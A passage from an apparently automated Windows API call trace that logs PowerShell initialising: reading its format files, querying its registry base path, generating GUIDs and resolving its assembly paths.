[2]=0x71, [3]=0x12, [4]=0xe, [5]=0x4b, [6]=0xff, [7]=0x82))) returned 0x0 [0135.655] SetErrorMode (uMode=0x1) returned 0x1 [0135.655] SetErrorMode (uMode=0x1) returned 0x1 [0135.655] GetFileType (hFile=0x304) returned 0x1 [0135.655] ReadFile (in: hFile=0x304, lpBuffer=0x33daf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33daf50*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.661] SetErrorMode (uMode=0x1) returned 0x1 [0135.661] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0135.661] SetErrorMode (uMode=0x1) returned 0x1 [0135.661] CoTaskMemAlloc (cb=0x5a) returned 0x1bd970 [0135.661] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.662] CoTaskMemFree (pv=0x1bd970) [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4a6551d5, Data2=0x74cf, Data3=0x4e2d, Data4=([0]=0xa4, [1]=0xed, [2]=0x5e, [3]=0x76, [4]=0x45, [5]=0x80, [6]=0x3f, [7]=0x4))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6a12d9df, Data2=0xee33, Data3=0x49bf, Data4=([0]=0xa8, [1]=0xea, [2]=0x57, [3]=0xdc, [4]=0xba, [5]=0xa8, [6]=0x77, [7]=0x26))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x14390518, Data2=0x2de0, Data3=0x48a2, Data4=([0]=0x9b, [1]=0x56, [2]=0xd6, [3]=0xf0, [4]=0xb, [5]=0xc3, [6]=0x6a, [7]=0xb7))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x88acc1bf, Data2=0xbc2c, Data3=0x48a3, Data4=([0]=0xa0, [1]=0x3, [2]=0xb4, [3]=0x28, [4]=0x12, [5]=0xf9, [6]=0x90, [7]=0x90))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x696ff25c, Data2=0x6599, Data3=0x4369, Data4=([0]=0xa9, [1]=0xb7, [2]=0x64, [3]=0xfb, [4]=0x56, [5]=0x59, [6]=0x4d, [7]=0x78))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8df64fba, Data2=0xcf30, Data3=0x4d5f, Data4=([0]=0x89, [1]=0x5b, [2]=0x31, [3]=0xaf, [4]=0x2d, [5]=0xc3, [6]=0xa, [7]=0xa2))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x903d8b98, Data2=0xaeac, Data3=0x415e, Data4=([0]=0x93, [1]=0xdc, [2]=0x60, [3]=0x83, [4]=0x70, [5]=0x8d, [6]=0x12, [7]=0x9b))) returned 0x0 [0135.668] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa7a8402a, Data2=0xa1d2, Data3=0x4c14, Data4=([0]=0xb0, [1]=0x6e, [2]=0xe1, [3]=0x5c, [4]=0x12, [5]=0xdf, [6]=0x1e, [7]=0x92))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6ad57166, Data2=0x183c, Data3=0x4d50, Data4=([0]=0xa9, [1]=0x70, [2]=0x8b, [3]=0xee, [4]=0x73, [5]=0x16, [6]=0x8e, [7]=0xfe))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7dda8b18, Data2=0x794c, Data3=0x4b46, Data4=([0]=0x8f, [1]=0x0, [2]=0x82, [3]=0x78, [4]=0xf, [5]=0xf2, [6]=0xd0, [7]=0xd6))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3dc73d0a, Data2=0x5e4d, Data3=0x4f10, Data4=([0]=0x95, [1]=0xd2, [2]=0x75, [3]=0xb3, [4]=0xf8, [5]=0x53, [6]=0x11, [7]=0xed))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4548fe0e, Data2=0x364a, Data3=0x4900, Data4=([0]=0xbc, [1]=0x39, [2]=0xb5, [3]=0x12, [4]=0xa6, [5]=0x31, [6]=0xe, [7]=0xca))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7a60f5e3, Data2=0xcb61, Data3=0x4951, Data4=([0]=0xa2, [1]=0x7a, [2]=0x1e, [3]=0xe0, [4]=0xe6, [5]=0x45, [6]=0x2f, [7]=0x24))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4813cf71, Data2=0x155c, Data3=0x4ae4, Data4=([0]=0xa9, [1]=0xf2, [2]=0xb8, [3]=0xa0, [4]=0x8f, [5]=0x91, [6]=0xa5, [7]=0xc5))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb14c81d9, Data2=0x12df, Data3=0x4b2b, Data4=([0]=0x91, [1]=0xcd, [2]=0x40, [3]=0xed, [4]=0x9c, [5]=0xea, [6]=0xdd, [7]=0x19))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdae8d023, Data2=0x37f4, Data3=0x42e3, Data4=([0]=0xa3, [1]=0x4f, [2]=0x2b, [3]=0xe5, [4]=0xc, [5]=0x9b, [6]=0x9e, [7]=0x8e))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcb391ab4, Data2=0xac4e, Data3=0x4170, Data4=([0]=0xa2, [1]=0x67, [2]=0x60, [3]=0xc4, [4]=0xf9, [5]=0x5d, [6]=0x32, [7]=0x7))) returned 0x0 [0135.670] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb0416922, Data2=0xfbb4, Data3=0x4587, Data4=([0]=0xaf, [1]=0xbd, [2]=0x28, [3]=0xef, [4]=0x20, [5]=0x11, [6]=0xa4, [7]=0x66))) returned 0x0 [0135.670] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa1c26a52, Data2=0x12dd, Data3=0x4fb9, Data4=([0]=0x8a, [1]=0x12, [2]=0xa8, [3]=0xc2, [4]=0x19, [5]=0x1b, [6]=0x29, [7]=0x4a))) returned 0x0 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1bf4e27, Data2=0xe5a1, Data3=0x4824, Data4=([0]=0xb9, [1]=0x7b, [2]=0x15, [3]=0x24, [4]=0x50, [5]=0xdf, [6]=0x75, [7]=0x8c))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdeb1a19b, Data2=0xe9e1, Data3=0x4944, Data4=([0]=0xb5, [1]=0xaf, [2]=0x3e, [3]=0xf2, [4]=0x60, [5]=0xef, [6]=0x30, [7]=0x85))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1c3f1c81, Data2=0xfb97, Data3=0x40e9, Data4=([0]=0x96, [1]=0xea, [2]=0x69, [3]=0xc5, [4]=0xa5, [5]=0x87, [6]=0x7a, [7]=0x6e))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf77a701a, Data2=0x3364, Data3=0x4257, Data4=([0]=0xa5, [1]=0x4f, [2]=0xf3, [3]=0x3c, [4]=0xb4, [5]=0x8a, [6]=0xa2, [7]=0x1c))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x67430acd, Data2=0x6528, Data3=0x4a9a, Data4=([0]=0x91, [1]=0xbb, [2]=0x4c, [3]=0xf8, [4]=0xc7, [5]=0xb6, [6]=0x2, [7]=0xe0))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xeafbc58b, Data2=0xbc1c, Data3=0x4114, Data4=([0]=0x9e, [1]=0x46, [2]=0x2a, [3]=0xc1, [4]=0xd2, [5]=0x1d, [6]=0x95, [7]=0xee))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3faa51ee, Data2=0x7562, Data3=0x4c6e, Data4=([0]=0x91, [1]=0xb4, [2]=0x12, [3]=0xab, [4]=0x85, [5]=0xe, [6]=0x6f, [7]=0x3a))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdfa03367, Data2=0x451e, Data3=0x411c, Data4=([0]=0xb6, [1]=0x31, [2]=0xbf, [3]=0x6f, [4]=0xd4, [5]=0xa, [6]=0x7e, [7]=0x8c))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfff4dcd5, Data2=0x3ddd, Data3=0x4b26, Data4=([0]=0xbc, [1]=0xa4, [2]=0x5f, [3]=0x27, [4]=0x7, [5]=0xe7, [6]=0x5e, [7]=0xbc))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x170721c1, Data2=0xb62f, Data3=0x41a8, Data4=([0]=0x8b, [1]=0xb3, [2]=0xec, [3]=0x23, [4]=0x78, [5]=0x0, [6]=0x75, [7]=0x51))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc07c29f1, Data2=0x6d35, Data3=0x49d0, Data4=([0]=0x8a, [1]=0x56, [2]=0x1e, [3]=0x6d, [4]=0x41, [5]=0x17, [6]=0x39, [7]=0xb4))) returned 0x0 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xec09a337, Data2=0x1fc3, Data3=0x4233, Data4=([0]=0xbb, [1]=0x88, [2]=0xc2, [3]=0x79, [4]=0x0, [5]=0xab, [6]=0xc7, [7]=0x3))) returned 0x0 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8960ee93, Data2=0x29cf, Data3=0x432e, Data4=([0]=0x82, [1]=0xcf, [2]=0x4c, [3]=0x5d, [4]=0x3f, [5]=0x4d, [6]=0xd4, [7]=0x37))) returned 0x0 [0135.673] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x80f2f23d, Data2=0xf804, Data3=0x4cba, Data4=([0]=0xb5, [1]=0xbe, [2]=0xce, [3]=0x8e, [4]=0x55, [5]=0xfb, [6]=0x62, [7]=0x9f))) returned 0x0 [0135.673] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.674] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.675] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x84956ae3, Data2=0xa22e, Data3=0x4e23, Data4=([0]=0xa1, [1]=0x83, [2]=0xa5, [3]=0xdd, [4]=0x63, [5]=0x36, [6]=0x0, [7]=0x14))) returned 0x0 [0135.675] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc9720bd1, Data2=0xe47, Data3=0x49fe, Data4=([0]=0xb0, [1]=0x5a, [2]=0xc8, [3]=0x6, [4]=0x6c, [5]=0xb, [6]=0xba, [7]=0x31))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4868e89c, Data2=0x2076, Data3=0x466f, Data4=([0]=0xa1, [1]=0x98, [2]=0xc9, [3]=0xc1, [4]=0x2, [5]=0xe0, [6]=0xb, [7]=0x8d))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd2720d46, Data2=0x7a1b, Data3=0x4446, Data4=([0]=0x98, [1]=0x84, [2]=0x3a, [3]=0x79, [4]=0xd9, [5]=0x8e, [6]=0xa2, [7]=0xa2))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xe6303f69, Data2=0x4a16, Data3=0x4961, Data4=([0]=0x8e, [1]=0xe4, [2]=0x76, [3]=0x32, [4]=0x6d, [5]=0xdb, [6]=0x20, [7]=0x18))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc9f0162f, Data2=0x18b7, Data3=0x45da, Data4=([0]=0x87, [1]=0x6a, [2]=0x3b, [3]=0x57, [4]=0xf2, [5]=0xd2, [6]=0xce, [7]=0x42))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3f0a2156, Data2=0xa791, Data3=0x49fb, Data4=([0]=0x8a, [1]=0x9a, [2]=0xa9, [3]=0xa7, [4]=0x4a, [5]=0xe6, [6]=0x5c, [7]=0xe2))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdc338947, Data2=0x69e, Data3=0x48dc, Data4=([0]=0x9c, [1]=0xdf, [2]=0xe9, [3]=0x4f, [4]=0xc9, [5]=0xfb, [6]=0xe3, [7]=0xca))) returned 0x0 [0135.677] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x241f3437, Data2=0x5823, Data3=0x4b4f, Data4=([0]=0xbe, [1]=0xcd, [2]=0x6a, [3]=0x91, [4]=0x64, [5]=0xdc, [6]=0x52, [7]=0x97))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xee695649, Data2=0x414c, Data3=0x459c, Data4=([0]=0xab, [1]=0xc5, [2]=0x25, [3]=0xf0, [4]=0x9e, [5]=0x5a, [6]=0xda, [7]=0xa5))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x51bd9a7, Data2=0x333e, Data3=0x49ad, Data4=([0]=0x96, [1]=0x37, [2]=0x8f, [3]=0x8f, [4]=0x7c, [5]=0x8f, [6]=0xd9, [7]=0x47))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7afea025, Data2=0x3270, Data3=0x430d, Data4=([0]=0xbe, [1]=0x4d, [2]=0x3c, [3]=0xef, [4]=0x94, [5]=0xaa, [6]=0xf5, [7]=0xb1))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x384137cc, Data2=0x7cd6, Data3=0x4eba, Data4=([0]=0x9d, [1]=0x72, [2]=0x87, [3]=0x91, [4]=0x5e, [5]=0x83, [6]=0x1c, [7]=0xb7))) returned 0x0 [0135.678] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x354eb0cb, Data2=0xe3db, Data3=0x4cf1, Data4=([0]=0xb6, [1]=0x2a, [2]=0x26, [3]=0x59, [4]=0xe9, [5]=0xc9, [6]=0xd6, [7]=0x87))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8aedee59, Data2=0xd93d, Data3=0x443a, Data4=([0]=0xb1, [1]=0x3a, [2]=0x79, [3]=0x6a, [4]=0x69, [5]=0xcf, [6]=0xc8, [7]=0x6d))) returned 0x0 [0135.678] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] SetErrorMode (uMode=0x1) returned 0x1 [0135.679] SetErrorMode (uMode=0x1) returned 0x1 [0135.679] GetFileType (hFile=0x304) returned 0x1 [0135.679] ReadFile (in: hFile=0x304, lpBuffer=0x3538f30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3538f30*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.686] SetErrorMode (uMode=0x1) returned 0x1 [0135.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0135.687] SetErrorMode (uMode=0x1) returned 0x1 [0135.687] CoTaskMemAlloc (cb=0x5a) returned 0x1bd970 [0135.687] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.687] CoTaskMemFree (pv=0x1bd970) [0135.687] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa2d10016, Data2=0x16b8, Data3=0x4421, Data4=([0]=0xaf, [1]=0xc9, [2]=0x6e, [3]=0x53, [4]=0xa6, [5]=0x66, [6]=0xb1, [7]=0xb8))) returned 0x0 [0135.688] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6ea4a5b3, Data2=0xfa66, Data3=0x4b3f, Data4=([0]=0x8b, [1]=0x9e, [2]=0x5e, [3]=0x90, [4]=0x7d, [5]=0xc0, [6]=0x26, [7]=0xc4))) returned 0x0 [0135.688] SetErrorMode (uMode=0x1) returned 0x1 [0135.688] SetErrorMode (uMode=0x1) returned 0x1 [0135.688] GetFileType (hFile=0x304) returned 0x1 [0135.688] ReadFile (in: hFile=0x304, lpBuffer=0x3576d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3576d18*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.708] SetErrorMode (uMode=0x1) returned 0x1 [0135.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0135.708] SetErrorMode (uMode=0x1) returned 0x1 [0135.709] CoTaskMemAlloc (cb=0x5a) returned 0x1bd970 [0135.709] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.709] CoTaskMemFree (pv=0x1bd970) [0135.709] VirtualQuery (in: lpAddress=0xcbb60, lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.709] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5b05c00d, Data2=0x36a9, Data3=0x4a88, Data4=([0]=0xb5, [1]=0xf9, [2]=0x88, [3]=0x1, [4]=0xb3, [5]=0x12, [6]=0x9a, [7]=0x68))) returned 0x0 [0135.709] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xef8d7228, Data2=0x3204, Data3=0x4b27, Data4=([0]=0xb3, [1]=0x15, [2]=0xea, [3]=0xf2, [4]=0x3b, [5]=0xaf, [6]=0x39, [7]=0xae))) returned 0x0 [0135.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.755] GetFullPathNameW (in: 